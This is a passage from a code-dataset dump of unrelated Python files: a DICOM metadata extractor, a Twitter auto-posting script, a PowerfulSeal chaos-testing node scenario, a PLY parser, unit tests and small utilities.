'__main__':\n\n unittest.main()\n","sub_path":"tests/python/test_mview.py","file_name":"test_mview.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"225427889","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport codecs\nimport csv\nfrom datetime import datetime\nimport re\nimport django\n\nfrom django.db import models\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(\"/neuro/users/yves.verpillieux/DicomInfoExtraction/prg/dmd2b_web\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"dmd2b_web.settings\"\ndjango.setup()\n\nfrom polls.models import PatientDetails, StudyDetails, SeriesDetails, AdditionalHeaderInfo\n\npydicomdir = os.path.join(os.getcwd(), \"pydicom-master\")\n\n##dicomfiles = os.path.join(\"C:\\Boston Children Hospital\\DicomInfoExtraction\\image\", \"sample\")\n\nos.chdir(r\"/net/tautona/neuro/labs/grantlab/users/yves.verpillieux/DicomInfoExtraction/prg/dicom\")\n\nprint (os.getcwd())\n\n#outputDir = os.path.join(r\"/net/tautona/neuro/labs/grantlab/users/yves.verpillieux/DicomInfoExtraction\", \"output\")\n\n#dicomDirTopLevel = os.path.join(os.getcwd(), \"SammyTestData\")\n\nsys.path.append(pydicomdir)\n\n\nfrom pydicom import dicomio\n\n\ndef retrieveDicomFiles():\n \"\"\"retireves all DICOM files stored in folders.\n \"\"\"\n lstFilesDCM = []\n for dirname, dirnames, filenames in os.walk('.', topdown=True, followlinks=True):\n for filename in filenames:\n\n if \".dcm\" in filename.lower():\n\n lstFilesDCM.append(os.path.join(dirname,filename))\n return lstFilesDCM\n\n\n\ndef extractDicomData(inputImageFileList):\n \"\"\"Reads and extracts Patient's Basic Info from a DICOM file.\n \"\"\"\n data = {} # dictionary of patients\n\n for i, dfile in enumerate(inputImageFileList):\n pydicomFileData = dicomio.read_file(dfile)\n\n############################## Patient Details #################################\n\n patientDetails = {}\n patientID = str(pydicomFileData.PatientID)\n if patientID in data:\n ''\n else:\n patientDetails[\"PatientID\"]=pydicomFileData.PatientID\n patientDetails[\"PatientName\"]= str.replace(str(pydicomFileData.PatientName),'^',' ')\n patientDetails[\"PatientSex\"]=pydicomFileData.PatientSex\n if pydicomFileData[0x00101010]:\n patientDetails[\"PatientReportedAge\"]=pydicomFileData.PatientAge\n else:\n patientDetails[\"PatientReportedAge\"]=''\n\n dob = datetime.strptime(pydicomFileData.PatientBirthDate , '%Y%m%d')\n sod = datetime.strptime(pydicomFileData.StudyDate, '%Y%m%d')\n patientDetails[\"PatientBirthDate\"]= dob\n\n patientDetails['Age_Days']= str.replace(str(sod-dob),'days, 0:00:00','')\n\n data[patientID] = {}\n data[patientID][\"patientInfo\"] = patientDetails\n data[patientID][\"studies\"] = {}\n\n############################## Study Details ###################################\n\n studyDetails = {}\n studyID=''\n if pydicomFileData[0x00200010]:\n studyID = str(pydicomFileData.StudyID)\n if studyID in data[patientID][\"studies\"]:\n ''\n else:\n studyDetails[\"StudyID\"]= pydicomFileData.StudyID\n studyDetails[\"StudyDescription\"]=pydicomFileData.StudyDescription\n studyDetails[\"StudyDate\"]= datetime.strptime(pydicomFileData.StudyDate, '%Y%m%d')\n #studyDetails[\"PatientID\"]=pydicomFileData.PatientID\n\n data[patientID][\"studies\"][studyID] = {}\n data[patientID][\"studies\"][studyID][\"studyInfo\"] = studyDetails\n data[patientID][\"studies\"][studyID][\"series\"] = {}\n\n############################## Series Details ##################################\n\n seriesDetails = {}\n seriesID = str(pydicomFileData.SeriesInstanceUID)\n if seriesID in data[patientID][\"studies\"][studyID][\"series\"]:\n ''\n else:\n seriesDetails[\"SeriesID\"]=pydicomFileData.SeriesInstanceUID\n seriesDetails[\"SeriesDescription\"]=pydicomFileData.SeriesDescription\n if pydicomFileData[0x00080060]:\n seriesDetails[\"Modality\"]=pydicomFileData.Modality\n else:\n seriesDetails[\"Modality\"]=''\n\n #if pydicomFileData[0x00200010]:\n # seriesDetails[\"StudyID\"]=pydicomFileData.StudyID\n #else:\n # seriesDetails[\"StudyID\"]=''\n\n #seriesDetails[\"PatientID\"]=pydicomFileData.PatientID\n\n data[patientID][\"studies\"][studyID][\"series\"][seriesID] = {}\n data[patientID][\"studies\"][studyID][\"series\"][seriesID][\"seriesInfo\"] = seriesDetails\n\n\n################################################################################\n #import pdb; pdb.set_trace()\n return data\n\n\n'''\ndef extractAdditionalHeaderInfo():\n lstFilesDCM = []\n headerInfoList =[]\n for dirname, dirnames, filenames in os.walk('.', topdown=True, followlinks=True):\n\n for filename in filenames:\n\n if \"0.info\" in filename.lower():\n\n lstFilesDCM.append(os.path.join(dirname,filename))\n\n tracker = set()\n\n for i, dfile in enumerate(lstFilesDCM):\n\n x = open(dfile,'r').readlines()\n inforDict ={\n\n y =x[3:]\n\n for xx in y:\n if \"PatientID\" in xx:\n inforDict[\"PatientID\"]=''.join(xx[12:])\n\n\n if \"Primary Slice Direction\" in xx:\n # print(xx[24:])\n inforDict[\"PrimarySliceDirection\"]=''.join(xx[24:])\n\n if \"ProtocolName\" in xx:\n\n inforDict[\"ProtocolName\"]=''.join(xx[14:])\n # print(xx)\n\n if \"voxel sizes\" in xx:\n\n inforDict[\"VoxelSizes\"]=''.join(xx[15:])\n # print(xx)\n\n if \"fov\" in xx:\n inforDict[\"fov\"]=''.join(xx[15:])\n\n if \"dimensions\" in xx:\n\n inforDict[\"dimensions\"]=''.join(xx[15:])\n\n if \"SeriesInstanceUID\" in xx:\n # print(xx[19:])\n\n inforDict[\"SeriesID\"]=''.join(xx[19:])\n\n\n # print(d)\n headerInfoList.append(inforDict)\n\n\n return headerInfoList\n'''\n\n\n\ndef saveTodb(data):\n \"\"\"Save in a django database created by the models\n \"\"\"\n inputfile = data #we have a list of dictionary\n print(data)\n\n for p in data:\n\n\n\n############### Saving Patient Details in a django database ####################\n\n pa = PatientDetails()\n pa.PatientID = p['PatientID']\n pa.PatientSex = p['PatientSex']\n pa.PatientBirthDate = p['PatientBirthDate']\n pa.Age_Days = p['Age_Days']\n pa.PatientName = p['PatientName']\n pa.PatientReportedAge = p['PatientReportedAge']\n\n #pa.save()\n\n################ Saving Study Details in a django database #####################\n\n sa = StudyDetails()\n sa.PatientID = p['PatientID']\n sa.StudyID = p['StudyID']\n sa.StudyDate = p['StudyDate']\n sa.StudyDescription = p['StudyDescription']\n\n sa.patient = pa\n\n #sa.save()\n\n################ Saving Series Details in a django database ####################\n\n se = SeriesDetails()\n se.PatientID = p['PatientID']\n se.SeriesID = p['SeriesID']\n se.SeriesDescription = p['SeriesDescription']\n se.Modality = p['Modality']\n se.StudyID = p['StudyID']\n\n se.patient = pa\n se.study = sa\n\n #se.save()\n\n############## Saving Additional Header Info in a django database ##############\n '''\n hi = AdditionalHeaderInfo()\n hi.PatientID = p['PatientID']\n try:\n hi.SeriesID = p['SeriesID']\n hi.fov = p['fov']\n hi.dimensions = p['dimensions']\n hi.VoxelSizes = p['VoxelSizes']\n hi.PrimarySliceDirection = p['PrimarySliceDirection']\n hi.ProtocolName = p['ProtocolName']\n except KeyError:\n pass\n\n hi.patient = pa\n hi.series = se\n hi.save()\n '''\n\n\nif __name__ == \"__main__\":\n\n saveTodb(extractDicomData(retrieveDicomFiles()))\n #saveTodb(extractAdditionalHeaderInfo())\n\n print('Done!')\n","sub_path":"services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238371452","text":"import variable\nfrom functions import utils\n\n\ndef test_message(update, context):\n message = update.message\n\n if message.chat.type == \"private\":\n return\n\n from_user = message['from_user']\n utils.send_in_private_or_in_group(\"Ciao!\", message.chat.id, from_user)\n\n\ndef do_stress_test(update):\n message = update.message\n from_user = message.from_user\n\n i = 0\n n = 100000000\n while i <= n:\n if i == n:\n variable.updater.bot.send_message(from_user.id, \"Completate \" + str(n) + \" iterazioni!\")\n i += 1\n\n\ndef stress_test(update, context):\n return # this function is disabled.\n # do_stress_test(update)\n","sub_path":"features/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"279206554","text":"import numpy as np\nfrom AnalyticGeometryFunctions import computeVectorNorm, computeAngleBetweenVectors\nimport pygame as pg\nimport os\n\n# init variables\nactionSpace = [[0, 1], [1, 0], [-1, 0], [0, -1], [1, 1], [-1, -1], [1, -1], [-1, 1]]\nxBoundary = [0, 180]\nyBoundary = [0, 180]\nvel = 1\n\n\nclass OptimalPolicy:\n def __init__(self, actionSpace):\n self.actionSpace = actionSpace\n\n def __call__(self, state):\n targetState = state[2:4]\n agentState = state[0:2]\n relativeVector = np.array(targetState) - np.array(agentState)\n angleBetweenVectors = {computeAngleBetweenVectors(relativeVector, action): action for action in\n np.array(self.actionSpace)}\n action = angleBetweenVectors[min(angleBetweenVectors.keys())]\n return action\n\n\ndef checkBound(state, xBoundary, yBoundary):\n xMin, xMax = xBoundary\n yMin, yMax = yBoundary\n xPos, yPos = state\n if xPos >= xMax or xPos <= xMin:\n return False\n elif yPos >= yMax or yPos <= yMin:\n return False\n return True\n\n\ndef getEachState(state):\n return state[:2], state[2:]\n\n\nclass TransitionFunction():\n def __init__(self, xBoundary, yBoundary, velocity):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n self.velocity = velocity\n\n def __call__(self, state, action):\n agentState, targetPosition = getEachState(state)\n actionMagnitude = computeVectorNorm(np.array(action))\n modifiedAction = np.array(action) * self.velocity / actionMagnitude\n newAgentState = np.array(agentState) + modifiedAction\n if checkBound(newAgentState, self.xBoundary, self.yBoundary):\n return np.concatenate([newAgentState, targetPosition])\n return np.concatenate([agentState, targetPosition])\n\n\nclass IsTerminal():\n def __init__(self, minDistance):\n self.minDistance = minDistance\n return\n\n def __call__(self, state):\n agentState, targetPosition = getEachState(state)\n relativeVector = np.array(agentState) - np.array(targetPosition)\n relativeDistance = computeVectorNorm(relativeVector)\n if relativeDistance <= self.minDistance:\n return True\n return False\n\n\nclass Reset():\n def __init__(self, xBoundary, yBoundary):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n\n def __call__(self):\n xMin, xMax = self.xBoundary\n yMin, yMax = self.yBoundary\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n while not (checkBound(initialAgentState, self.xBoundary, self.yBoundary) and checkBound(targetPosition,\n self.xBoundary,\n self.yBoundary)):\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n return np.concatenate([initialAgentState, targetPosition])\n\n\nclass FixedReset():\n def __init__(self, xBoundary, yBoundary):\n self.xBoundary = xBoundary\n self.yBoundary = yBoundary\n\n def __call__(self):\n xMin, xMax = self.xBoundary\n yMin, yMax = self.yBoundary\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n initialDistance = computeVectorNorm(targetPosition - initialAgentState)\n while not (checkBound(initialAgentState, self.xBoundary, self.yBoundary) and checkBound(targetPosition,\n self.xBoundary,\n self.yBoundary) and initialDistance >= 20):\n initialAgentState = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n targetPosition = np.array([np.random.uniform(xMin, xMax), np.random.uniform(yMin, yMax)])\n initialDistance = computeVectorNorm(targetPosition - initialAgentState)\n return np.concatenate([initialAgentState, targetPosition])\n\n\nclass Render():\n def __init__(self, numAgent, numOneAgentState, positionIndex, screen, screenColor, circleColorList, circleSize,\n saveImage, saveImagePath):\n self.numAgent = numAgent\n self.numOneAgentState = numOneAgentState\n self.positionIndex = positionIndex\n self.screen = screen\n self.screenColor = screenColor\n self.circleColorList = circleColorList\n self.circleSize = circleSize\n self.saveImage = saveImage\n self.saveImagePath = saveImagePath\n\n def __call__(self, state):\n for j in range(1):\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n self.screen.fill(self.screenColor)\n for i in range(self.numAgent):\n oneAgentState = state[self.numOneAgentState * i: self.numOneAgentState * (i + 1)]\n oneAgentPosition = oneAgentState[min(self.positionIndex): max(self.positionIndex) + 1]\n pg.draw.circle(self.screen, self.circleColorList[i],\n [np.int(oneAgentPosition[0]), np.int(oneAgentPosition[1])], self.circleSize)\n pg.display.flip()\n if self.saveImage == True:\n filenameList = os.listdir(self.saveImagePath)\n pg.image.save(self.screen, self.saveImagePath + '/' + str(len(filenameList)) + '.png')\n pg.time.wait(1)\n","sub_path":"src/neuralNetwork/toSeparateFiles/continuousEnv.py","file_name":"continuousEnv.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"576672092","text":"# Copyright 2013-2015 ARM Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\n# pylint: disable=R0201\nfrom unittest import TestCase\n\nfrom nose.tools import raises, assert_equal # pylint: disable=E0611\n\nfrom wlauto.utils.android import check_output\nfrom wlauto.utils.misc import merge_dicts, TimeoutError\n\n\nclass TestCheckOutput(TestCase):\n\n def test_ok(self):\n check_output(\"python -c 'import time; time.sleep(0.1)'\", timeout=0.5, shell=True)\n\n @raises(TimeoutError)\n def test_bad(self):\n check_output(\"python -c 'import time; time.sleep(1)'\", timeout=0.5, shell=True)\n\n\nclass TestMerge(TestCase):\n\n def test_dict_merge(self):\n base = {'a': 1, 'b': {'x': 9, 'z': 10}}\n other = {'b': {'x': 7, 'y': 8}, 'c': [1, 2, 3]}\n result = merge_dicts(base, other)\n assert_equal(result['a'], 1)\n assert_equal(result['b']['x'], 7)\n assert_equal(result['b']['y'], 8)\n assert_equal(result['b']['z'], 10)\n assert_equal(result['c'], [1, 2, 3])\n\n def test_merge_dict_lists(self):\n base = {'a': [1, 3, 2]}\n other = {'a': [3, 4, 5]}\n result = merge_dicts(base, other)\n assert_equal(result['a'], [1, 3, 2, 3, 4, 5])\n result = merge_dicts(base, other, list_duplicates='first')\n assert_equal(result['a'], [1, 3, 2, 4, 5])\n result = merge_dicts(base, other, list_duplicates='last')\n assert_equal(result['a'], [1, 2, 3, 4, 5])\n\n @raises(ValueError)\n def test_type_mismatch(self):\n base = {'a': [1, 2, 3]}\n other = {'a': 'test'}\n merge_dicts(base, other, match_types=True)\n\n","sub_path":"wlauto/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"606434883","text":"#!/usr/bin/python2\n'''\nAuthor: Keyvan Hedayati <k1.hedayati93@gmail.com>\nLicense: GNU General Public License, version 2\nTODO: Improve code and OOP\n'''\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nfrom logging import debug, basicConfig, info, error, critical, DEBUG\nfrom os.path import dirname, realpath, joinpath\nfrom re import compile, IGNORECASE, DOTALL\nfrom sqlite3 import connect, Error\nfrom time import sleep\nfrom urllib2 import urlopen, URLError\n\nfrom twitter import Twitter, OAuth, TwitterHTTPError\n\n\nclass AutoTweet():\n\n def __init__(self, *args):\n '''\n Tries to create or connect to database and store instance in\n class variable db, if failed log error and exit.\n '''\n try:\n db_path = joinpath(dirname(realpath(__file__)), 'data.db')\n self.db = connect(db_path)\n self.twitter = self.get_twitter_object()\n self.tweet(*args)\n except Error as e:\n critical('Could not Connect to Database, ', e.args[0])\n exit(1)\n\n def get_twitter_object(self):\n '''\n Tries to get an instance of twitter object from oauth table data\n and return created Twitter instance, if faild log error and exit.\n '''\n try:\n cursor = self.db.cursor()\n result = cursor.execute('SELECT * FROM oauth').fetchone()\n auth = OAuth(result[0], result[1], result[2], result[3])\n return Twitter(auth=auth)\n except Error as e:\n critical('Could not Get OAuth Data, %s', e.args[0])\n exit(1)\n except TypeError as e:\n critical('First insert OAuth secrets in database, %s',\n e.args[0])\n exit(1)\n\n def prepare_tweet(self, tweet_is_url, add_auto_tweet):\n '''\n Get a tweet from database then if tweet_is_url was true then\n gets title of URL and appends it tweet also if there is no\n internet connection waits until connection established, finally\n returns tweet string with #AutoTweet hash tag if add_auto_tweet\n was true, also catches some exception and handles then, such as\n database and URL errors\n '''\n try:\n cursor = self.db.cursor()\n id, tweet = cursor.execute('SELECT id, tweet FROM tweets WHERE \\\n sent = 0 LIMIT 1').fetchone()\n self.id = id\n if tweet_is_url:\n if not (tweet.startswith('http://') or\n tweet.startswith('https://')):\n tweet = 'http://' + tweet\n self.wait_for_connection()\n page = urlopen(tweet).read()\n regex = compile('<title>(.*?)',\n IGNORECASE | DOTALL)\n\n title = regex.search(str(page)).group(1)\n tweet = title + ' ' + tweet\n return tweet + (' #AutoTweet' if add_auto_tweet else '')\n except URLError as e:\n critical('Could not Open URL, %s', e.args[0])\n exit(1)\n except TypeError as e:\n critical('First Insert Some Tweets into Database, %s',\n e.args[0])\n exit(1)\n except Error as e:\n critical('Database Problem, Could not Get Tweet, %s',\n e.args[0])\n exit(1)\n\n def mark_as_sent(self):\n '''\n After successfully tweeted a tweet updates its record to show\n that we are done with this tweet\n '''\n try:\n cursor = self.db.cursor()\n cursor.execute('UPDATE tweets SET sent = 1 WHERE id = ?',\n (self.id,))\n self.db.commit()\n except Error as e:\n critical('Could not Mark As Sent, %s', e.args[0])\n\n def wait_for_connection(self, wait=60, retry=100):\n '''\n Waits untill conection establishes and can open twitter.com\n without error.\n '''\n for i in range(retry):\n try:\n response = urlopen('http://twitter.com', timeout=10)\n return\n except URLError:\n sleep(wait)\n\n def tweet(self, tweet_is_url, add_auto_tweet):\n '''\n Main method, tweets on twitter with waiting for internet connection,\n marking it as sent, logging and catching exceptions.\n '''\n try:\n tweet = self.prepare_tweet(tweet_is_url, add_auto_tweet).strip()\n info('Tweeting: %s', tweet)\n self.wait_for_connection()\n self.twitter.statuses.update(status=tweet)\n info('Tweeted Successfully')\n self.mark_as_sent()\n except URLError as e:\n critical('Connection refused, %s', e.args[0])\n exit(1)\n except TwitterHTTPError as e:\n critical('Authentication Problem, Check OAuth Values')\n exit(1)\n\n\nclass Install():\n def __init__(self, first_time=False):\n '''\n Connects to database, if first_time was true then installs database\n '''\n self.db = connect('data.db')\n if first_time:\n self.install_database()\n self.get_oauth()\n self.insert_tweets()\n\n def remove_table_data(self, tables):\n ''' Removes specified table from database. '''\n try:\n cursor = self.db.cursor()\n for table in tables:\n cursor.execute('DELETE FROM ' + table)\n self.db.commit()\n except Error as e:\n critical('Could not Delete%sData, %s', (' '.join(tables),\n e.args[0]))\n exit(1)\n\n def install_database(self):\n ''' Create database tables '''\n try:\n cursor = self.db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS tweets \\\n (id INTEGER PRIMARY KEY, tweet TEXT UNIQUE,\\\n sent INTEGER)')\n cursor.execute('CREATE TABLE IF NOT EXISTS oauth \\\n (access_token TEXT, access_token_secret TEXT, \\\n consumer_key TEXT, consumer_secret TEXT)')\n self.db.commit()\n critical('Database Created Successfully')\n except Error as e:\n self.db.rollback()\n critical('Database error occurred, %s', e.args[0])\n exit(1)\n\n def get_oauth(self):\n ''' Gets oauth data from user and stores them in database. '''\n try:\n consumer_key = raw_input('Enter Consumer Key: ')\n consumer_secret = raw_input('Enter Consumer Secret: ')\n access_token = raw_input('Enter Access Token: ')\n access_token_secret = raw_input('Enter Access Token Secret: ')\n\n cursor = self.db.cursor()\n self.remove_table_data(['oauth'])\n cursor.execute('INSERT INTO oauth VALUES (?, ?, ?, ?)',\n (access_token, access_token_secret, consumer_key,\n consumer_secret))\n self.db.commit()\n info('OAuth Data Inserted Successfully')\n except Error as e:\n self.db.rollback()\n critical('Could not insert oauth data, %s', e.args[0])\n exit(1)\n\n def insert_tweets(self):\n '''\n Gets tweets filename and inserts them into database, also removes\n trailing newline.\n '''\n try:\n cursor = self.db.cursor()\n filename = raw_input('Enter Tweets Filename: ')\n tweets = open(filename)\n for tweet in tweets:\n if tweet[-1:] == '\\n':\n tweet = tweet[:-1]\n cursor.execute('INSERT INTO tweets(tweet, sent) VALUES (?, ?)',\n (tweet, 0))\n tweets.close()\n self.db.commit()\n info('Tweets Inserted Successfully')\n except IOError as e:\n critical('File not Found')\n exit(1)\n except Error as e:\n self.db.rollback()\n critical('Could not insert Tweets, %s', e.args[0])\n exit(1)\n\n\ndef main():\n '''\n Parses args, configs logging and call right function depending on given\n arguments\n '''\n args = parse_args()\n log_file = joinpath(dirname(realpath(__file__)), 'log')\n basicConfig(filename=log_file, level=DEBUG)\n if args.remove:\n Install().remove_table_data(args.remove)\n if args.install:\n if 'all' in args.install:\n Install(first_time=True)\n else:\n if 'db' in args.install:\n Install().install_database()\n if 'auth' in args.install:\n Install().get_oauth()\n if 'tweet' in args.install:\n Install().insert_tweets()\n exit(0)\n for i in range(args.num):\n AutoTweet(args.url, args.add_auto_tweet)\n exit(0)\n\n\ndef parse_args():\n ''' Parses arguments '''\n description = 'Automatically tweets from list'\n formatter_class = ArgumentDefaultsHelpFormatter\n parser = ArgumentParser(description=description,\n formatter_class=formatter_class)\n parser.add_argument('-i',\n '--install',\n choices=('all', 'db', 'auth', 'tweet'),\n help='Install database(db), oauth data(auth)\\\n and tweets to be tweeted(tweet)',\n nargs='*')\n parser.add_argument('-r',\n '--remove',\n choices=('oauth', 'tweets'),\n help='Removes inserted data from database',\n nargs='*')\n parser.add_argument('-n',\n '--num',\n default=1,\n help='Number of tweets to be tweeted at once',\n type=int)\n parser.add_argument('-u',\n '--url',\n action='store_true',\n default=True,\n help='When tweet is a URL this option will try\\\n to get title of URL and append it to tweet'\n )\n parser.add_argument('-a',\n '--no-auto-tweet',\n action='store_false',\n dest='add_auto_tweet',\n help='Whether to add #AutoTweet hash tag or not')\n return parser.parse_args()\n\nif __name__ == '__main__':\n main()\n","sub_path":"AutoTweet.py","file_name":"AutoTweet.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"598326613","text":"\n# Copyright 2017 Bloomberg Finance L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom powerfulseal.metriccollectors.collector import NODE_SOURCE\nfrom .scenario import Scenario\n\n\nclass NodeScenario(Scenario):\n \"\"\" NodeScenarios scenario handler.\n\n Adds metching for nodes and node-specific actions\n \"\"\"\n\n def __init__(self, name, schema, inventory, driver,\n executor, logger=None, metric_collector=None):\n Scenario.__init__(self, name, schema, logger=logger, metric_collector=metric_collector)\n self.inventory = inventory\n self.driver = driver\n self.executor = executor\n\n def match(self):\n \"\"\" Makes a union of all the nodes matching any of the policy criteria.\n \"\"\"\n selected_nodes = set()\n criteria = self.schema.get(\"match\", [])\n for node in self.inventory.find_nodes():\n for criterion in criteria:\n match = criterion.get(\"property\")\n if self.match_property(node, match):\n self.logger.info(\"Matching %r\", node)\n selected_nodes.add(node)\n if len(selected_nodes) == 0:\n self.metric_collector.add_matched_to_empty_set_metric(NODE_SOURCE)\n return list(selected_nodes)\n\n def action_start(self, item, params):\n \"\"\" Action to start a node.\n \"\"\"\n self.logger.info(\"Action start on %r\", item)\n try:\n self.driver.start(item)\n except:\n self.logger.exception(\"Error starting the machine\")\n\n def action_stop(self, item, params):\n \"\"\" Action to stop a node.\n \"\"\"\n self.logger.info(\"Action stop on %r\", item)\n try:\n self.metric_collector.add_node_stopped_metric(item)\n self.driver.stop(item)\n except:\n self.metric_collector.add_node_stop_failed_metric(item)\n self.logger.exception(\"Error stopping the machine\")\n\n def action_execute(self, item, params):\n \"\"\" Executes arbitrary code on the node.\n \"\"\"\n cmd = params.get(\"cmd\", \"hostname\")\n self.logger.info(\"Action execute '%s' on %r\", cmd, item)\n for value in self.executor.execute(\n cmd, nodes=[item]\n ).values():\n if value[\"ret_code\"] > 0:\n self.logger.info(\"Error return code: %s\", value)\n self.metric_collector.add_execute_failed_metric(item)\n\n def act(self, items):\n \"\"\" Executes all the supported actions on the list of nodes.\n \"\"\"\n self.logger.info(\"Acting on these: %r\", items)\n actions = self.schema.get(\"actions\", [])\n mapping = {\n \"stop\": self.action_stop,\n \"start\": self.action_start,\n \"wait\": self.action_wait,\n \"execute\": self.action_execute,\n }\n return self.act_mapping(items, actions, mapping)\n\n","sub_path":"powerfulseal/policy/node_scenario.py","file_name":"node_scenario.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"526387871","text":"from django.shortcuts import render\nfrom models import Employee\n\n# Create your views here.\n\ndef index(request):\n employee = Employee.objects.create(\n email=\"pedro.kong@company.com\",\n first_name=\"Pedro\",\n last_name=\"Kong\"\n )\n employee.save()\n return render(request, 'core/index.html', {})","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"647062660","text":"'''Prefix Averages Algoritm'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef prefix_averages(l):\n\n '''Given a sequence S consisting of n numbers, we want to compute a sequence A such\n that A[ j] is the average of elements S[0], . . . , S[ j], for j = 0, . . . , n − 1,'''\n\n num = len(l)\n A = [0] * num\n total = 0\n for i in range(num):\n total += l[i]\n A[i] = total / (i + 1)\n return A\n\nif __name__ == \"__main__\":\n\n # test Prefix Averages\n dd = np.random.randint(1,40, 40)\n plt.plot(prefix_averages(dd))\n plt.plot(dd, c='r')\n plt.legend(['Prefix Ave', 'Initial numbers'])\n plt.title('Prefix Averages')\n plt.show();\n","sub_path":"Prefix_Averages.py","file_name":"Prefix_Averages.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"601028800","text":"import ply.yacc as yacc\nimport ply.lex as lex\n\nclass LexerError(Exception): pass\n#List of tokes\ntokens = (\n 'NUM',\n 'OPEN_BRACKET',\n 'CLOSE_BRACKET',\n 'COMMA',\n 'LABEL',\n 'NEWLINE'\n)\n#regular expression rules for simple tokens\nt_OPEN_BRACKET = r'\\['\nt_CLOSE_BRACKET = r'\\]'\nt_COMMA = r'\\,'\n\ndef t_LABEL(t):\n r'([ A-Za-z ]+(_[0-9]+)*)'\n # r'[ a-zA-Z_][a-zA-Z0-9_]*'\n t.value = str(t.value)\n return t\n\ndef t_NUM(t):\n r'[0-9]+(\\.[0-9]+)?'\n t.value = float(t.value)\n return t\n\ndef t_NEWLINE(t):\n r'\\n+'\n t.value = str(t.value)\n t.lexer.lineno += len(t.value)\n return t\n\nt_ignore = ' \\t'\n#error handling rule\ndef t_error(t):\n # print(\"Illegal characters '%s'\" % t.value[0])\n raise LexerError(\"Illegal character '%s'\" % t.value)\n # t.lexer.skip(1)\n\ndef p_start(t):\n ''' start : expression NEWLINE start \n | expression'''\n if len(t) == 2:\n t[0] = [t[1]]\n else:\n t[3].append(t[1])\n t[0] = t[3]\n\ndef p_expression(t):\n '''expression : OPEN_BRACKET seriedata CLOSE_BRACKET'''\n t[2].reverse()\n t[0] = t[2]\n\ndef p_seriedata(t):\n ''' seriedata : OPEN_BRACKET LABEL COMMA LABEL COMMA NUM CLOSE_BRACKET COMMA seriedata \n | OPEN_BRACKET LABEL COMMA LABEL COMMA NUM CLOSE_BRACKET'''\n if len(t) == 8:\n t[0] = [[t[2], t[4], t[6]]]\n else:\n t[9].append([t[2], t[4], t[6]])\n t[0] = t[9]\n\ndef p_error(t):\n raise LexerError(\"Illegal character '%s'\" % t.value)\n # print(\"Syntax error at '%s'\" % t.value)\n\ndef parse(text):\n #Build the lexer\n lexer = lex.lex()\n parser = yacc.yacc()\n if text[-1]=='\\n':\n text=text[:-1]\n result=None\n try:\n result = parser.parse(text)\n except:\n pass\n if result:\n result.reverse()\n return result\n\n# data=''' [[elias,juan,100],[juan,jose ,200],[jose,comio,200]]\n# [[pepe,pedro,100],[pedro,jose ,200],[jose,comio,200]] '''\n# print(parse(data))","sub_path":"api/parsers/grammars/g_str_str_weight_list/g_str_str_weight_list.py","file_name":"g_str_str_weight_list.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613619100","text":"from uploader import *\r\n# Need to push to Rabbit mq\r\nimport pika\r\n\r\nclass RabbitMQUploader(Uploader):\r\n \r\n def __init__(self, start = 1600, connect = 'iut2-net3.iu.edu', metricName='org.osg.general-perfsonar-simple.conf'):\r\n Uploader.__init__(self, start, connect, metricName)\r\n self.maxMQmessageSize = self.readConfigFile('mq-max-message-size')\r\n 